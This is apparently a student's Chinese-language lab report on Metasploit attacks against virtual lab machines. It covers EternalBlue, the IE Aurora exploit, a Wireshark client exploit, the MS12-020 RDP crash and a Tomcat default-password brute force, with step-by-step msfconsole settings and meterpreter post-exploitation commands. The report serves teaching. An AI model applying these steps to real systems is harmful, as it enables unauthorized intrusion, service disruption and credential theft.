20192420 任文朗 2021-2022-2 《網路與系統攻防技術》實驗六實驗報告 _
阿新 • • 發佈:2022-05-12
實驗六 Metasploit攻擊滲透實踐
目錄一、實踐內容
本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:
1.1 一個主動攻擊實踐,儘量使用最新的類似漏洞;
1.2 一個針對瀏覽器的攻擊,儘量使用最新的類似漏洞;
1.3 一個針對客戶端的攻擊,如Adobe或office,儘量使用最新的類似漏洞;
1.4 成功應用任何一個輔助模組。
二、實踐目的
2.1 實踐目的
· 掌握metasploit的基本應用方式,
· 完成簡單的攻擊實踐
2.2 實驗所涉及的知識點
· exploits模組 漏洞攻擊模組列表,入侵式 命名規則 模組/系統/服務/名稱 · payloads模組 漏洞負載模組與exploits模組配合使用的用於入侵後的操作 · auxiliary模組 輔助模組,通常用於沒有攻擊荷載的漏洞攻擊 · encoders模組 編碼器模組,用於msfvenom -e or · msf執行時也可以使用通常用於生成木馬等操作 · nops(無操作生成器模組)post(開發模組)這兩個模組不常用
三、實踐過程
3.1 任務一 完成一個主動攻擊實踐,儘量使用最新的類似漏洞
· 漏洞名稱:永恆之藍(MS17_010) · 漏洞簡介:永恆之藍”攻擊程式利用的是Windows SMB遠端提權漏洞,可以攻擊開放了445 端 口的 Windows 系統並提升至系統許可權,潛入電腦對多種檔案型別加密,並彈出勒索框,向用戶 索要贖金(以比特幣支付)用於解密 · 攻擊方:kali linux(64位)IP:192.168.42.132 · 靶機:windows 7(64位) IP:192.168.42.135 · 步驟一 在msf控制檯中查詢關於該漏洞的相關資訊 在msf控制檯輸入 search ms17_010 命令,我們可以看到有關該漏洞的模組資訊。 輸入info命令進而可以檢視該漏洞的詳細資訊,如下圖所示
· 步驟二 利用相關漏洞模組,設定相應的攻擊選項
我們選擇了永恆之藍的相關模組之後,我們需要設定相關的攻擊載荷(ps:我們需要用
的攻擊載荷windows/meterpreter/reverse_tcp已經被設定成為了預設,所以這裡我們可以
不用另加設定)。攻擊載荷和模組資訊確認後,我們輸入 show options 檢視我們需要配置的相
關資訊,在這裡我們可以看到只需要設定RHOSTS選項即可。所以,在這裡我們將靶機的IP地址設
置為RHOSTS,隨即開始exploit攻擊
· 步驟三 攻擊成功後,可以輸入相關的命令進行滲透操作
我們可以輸入 screenshot 命令,獲取當前靶機的螢幕截圖,如下圖所示
輸入 upload hello.txt c://
,在靶機的C盤上上傳一個我們在kali裡建立的文字檔案,如下圖所示
· PS:做以上實驗的時候需要確保靶機的445埠開啟,在做滲透之前可以先用nmap掃描一下目
標靶機,做好漏洞滲透的前期準備
3.2 任務二 完成一個針對瀏覽器的攻擊,儘量使用最新的類似漏洞
· 漏洞名稱:極光漏洞(MS10_002)
· 漏洞簡介:它是IE瀏覽器漏洞,也稱“極光漏洞”,可以通過該漏洞獲取目標主機的控制權
· 攻擊方:kali linux(64位)IP:192.168.42.132
· 靶機:windows xp(64位) IP:192.168.42.131
· 步驟一 在msf控制檯中查詢關於該漏洞的相關資訊
在msf控制檯輸入 search ms10_002 命令,我們可以看到有關該漏洞的模組資訊,
如下圖所示
· 步驟二 利用相關漏洞模組,配置相應的攻擊選項
我們選擇了極光漏洞的相關模組之後,我們需要設定相關的攻擊載荷(ps:我們需要
用的攻擊載荷windows/meterpreter/reverse_tcp已經被設定成為了預設,所以這裡我們可
以不用另加設定)。攻擊載荷和模組資訊確認後,我們輸入 show options 檢視我們需要配置的
相關資訊,這裡我們需要SRVHOST、URIPATH選項(該選項雖然不是必須,但是為了有所區別還
是可以設定)
設定相關的攻擊選項
· 步驟三 開始攻擊,獲取相應的會話資訊
輸入命令 run ,開始進行滲透攻擊,我們可以得到一個建立的釣魚網站網址,將這個
網址複製到靶機的瀏覽器輸入後,我們可以發現會話建立,說明攻擊成功
· 步驟四 通過會話資訊獲取相應靶機的許可權,執行相應命令
輸入命令 sessions 1,進入會話獲取到了靶機許可權。輸入命令 help 我們可以看到
在這裡可以執行哪些相關的命令
我們可以輸入 screenshot 命令,獲取當前靶機的螢幕截圖,如下圖所示
輸入 execute -f notepad.exe 命令,在靶機上啟動記事本程式
輸入 ipconfig 命令,檢視靶機的IP地址資訊
3.3 任務三 完成一個針對客戶端的攻擊,如Adobe或office,儘量使用最新的類似漏洞
· 客戶端軟體:wireshark(versions-1.4.3,32位)
· 攻擊方:kali linux(64位)IP:192.168.42.132
· 靶機:windows xp(32位) IP:192.168.42.131
· 步驟一 在msf控制檯中查詢關於該漏洞的相關資訊
在msf控制檯輸入 search wireshark 命令,我們可以看到有關該漏洞的模組資訊,
如下圖所示
· 步驟二 利用相關漏洞模組,配置相應的攻擊選項
我們選擇了wireshark的相關模組(exploit/windows/misc/wireshark_packet
_dect)之後,我們需要設定相關的攻擊載荷(ps:我們需要用的攻擊載荷windows/meterpret
er/reverse_tcp已經被設定成為了預設,所以這裡我們可以不用另加設定)。攻擊載荷和模組信
息確認後,我們輸入 show options 檢視我們需要配置的相關資訊,這裡我們需要LHOST、LPO
RT選項
· 步驟三 開始攻擊,獲取相應的wireshark抓包檔案
輸入命令 exploit ,開始進行滲透攻擊,我們可以得到一個建立的wireshark抓包
檔案,將這個檔案複製到靶機中雙擊開啟,我們可以發現攻擊成功
PS:在實現上述操作時,一定要注意虛擬機器的版本一定要是32位,並且wireshark的版本也是有
一定限制的
3.4 任務四 成功應用任何一個輔助模組
· 漏洞名稱:藍屏攻擊漏洞(MS12_020)
· 漏洞簡介:入侵者(黑客)可以通過向遠端桌面預設埠(3389)發一系列特定RDP包,從而獲
取超級管理員許可權,進而入侵系統。
· 攻擊方:kali linux(64位)IP:192.168.42.132
· 靶機:windows 7(64位) IP:192.168.42.135
· 步驟一 在msf控制檯中查詢關於該漏洞的相關資訊
在msf控制檯輸入 search ms12_020 命令,我們可以看到有關該漏洞的模組資訊(a
uxiliary掃描模組可以作為輔助模組),如下圖所示
· 步驟二 利用相關漏洞模組,配置相應的攻擊選項
我們選擇了藍屏攻擊的相關模組之後,我們不需要設定相關的攻擊載荷(ps:輔助模組
不需要設定攻擊載荷)。模組資訊確認後,我們輸入 show options 檢視我們需要配置的相關信
息,這裡我們只需要設定RHOSTS選項。輸入 exploit 命令開始攻擊,我們可以通過該輔助模組
發現目標主機是能夠受該漏洞攻擊的
· 步驟三 利用該漏洞的其他模組實現攻擊
我們選擇ms12_020_maxchannellids模組,設定相應的攻擊選項(這裡只需要設定R
HOSTS選項即可),輸入 exploit 命令開始攻擊,看到反饋資訊後說攻擊成功
轉到靶機端檢視情況,可以觀察到系統已經藍屏了
PS:實現上述操作需要注意一定要保持靶機的3389埠開啟
3.5 任務五 完成一個針對伺服器端的攻擊,儘量使用最新的類似漏洞
· 漏洞名稱:tomcat弱口令漏洞
· 漏洞簡介:在tomcat8環境下預設進入後臺的密碼為tomcat/tomcat,未修改造成未授權即可
進入後臺,或者管理員把密碼設定成弱口令, 使用工具對其進行窮舉。得到密碼後,也可以進行
後臺上傳惡意程式碼控制伺服器
· 攻擊方:kali linux(64位)IP:192.168.42.132
· 靶機:metasploit ubuntu IP:192.168.42.130
· 步驟一 利用nmap掃描,檢視目標靶機是否開啟了tomcat服務
輸入 nmap -sV 192.168.42.130,查詢目標靶機是否開啟了tomcat服務。通過
下圖可以看出,tomcat所屬的8180埠已經被打開了
· 步驟二 進入msf控制檯,查詢相應的模組資訊
在msf控制檯輸入 search tomcat 命令,我們可以看到有關tomcat的模組資訊,
選擇 tomcat_mgr_login 模組資訊作為攻擊物件,如下圖所示
· 步驟三 利用相關漏洞模組,配置相應的攻擊選項
我們選擇了tomcat的相關模組之後,我們不需要設定相關的攻擊載荷。模組資訊確認
後,我們輸入 show options 檢視我們需要配置的相關資訊,這裡我們需要設定PASS_FILE
選項、USER_FILE選項、RHOSTS選項、RPORT選項
· 步驟四 利用密碼和使用者名稱字典實現爆破
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/t
omcat_mgr_default_pass.txt ————密碼字典
set USER_FILE /usr/share/metasploit- framework/data/wordlists/
tomcat_mgr_default_users.txt ————使用者字典
通過以上兩個字典我們對靶機進行攻擊即可得到正確的使用者密碼
· 步驟五 設定另外的攻擊模組,對tomcat進行滲透
選擇 tomcat_mgr_deploy 模組,輸入 show options 命令檢視需要配置的選
項。在終端下輸入“set RHOST 192.168.42.130”,設定攻擊的目標主機IP;在終端下輸入
“set RPORT 8180”,設定攻擊的目標主機埠號;在終端下輸入“set username tomcat”,
設定攻擊時使用的登入賬號tomcat;在終端下輸入“set password tomcat”,設定攻擊時使
用的密碼tomcat;在終端下輸入“exploit”,開始攻擊,建立會話
· 步驟六 攻擊成功後,可以輸入相關的命令進行滲透操作
輸入命令 ls 檢視當前目錄檔案
輸入命令 whoami 檢視當前使用者和命令 ifconfig檢視網絡卡配置
四、問題及解決方案
4.1 問題一
· 問題描述
在完成藍屏攻擊實驗時,沒有開啟3389埠,導致攻擊失敗
· 解決方案
查詢相關部落格和詢問同學得到了相關的答案
4.2 問題二
· 問題描述
在完成客戶端攻擊時,因系統版本和軟體版本問題導致攻擊失敗
· 解決方案
在學長那裡要到了相關資源,因為網上很少有這些方面的東西了
五、學習感悟及思考
這是本學期網路攻防課的第六次實驗,本次實驗的目的是實現Metasploit攻擊滲透實踐。本次實驗相較於前幾次實驗來說更加簡單,但簡單歸簡單,我還是通過這次實驗學到了很多知識。在這次實驗中我能夠靈活運用相關的MSF命令進行滲透和學到了很多相關的漏洞等。雖然在其中不免遇到了很多困難,但是在老師和同學的幫助下我還是一一解決了這些問題,實現了自我的進步。
通過這次實驗,我也意識到了學好網路攻防課的核心在於實踐,雖然老師課上講的東西很多,但是通過自己的實踐將這些知識靈活運用,卻是對知識的最好把握,相信在之後的實驗課中能夠學到更多的東西,提升自己的能力。
六、參考資料
· MSF系列——簡介及基本命令使用 https://blog.csdn.net/weixin_49340699/article
/details/112488864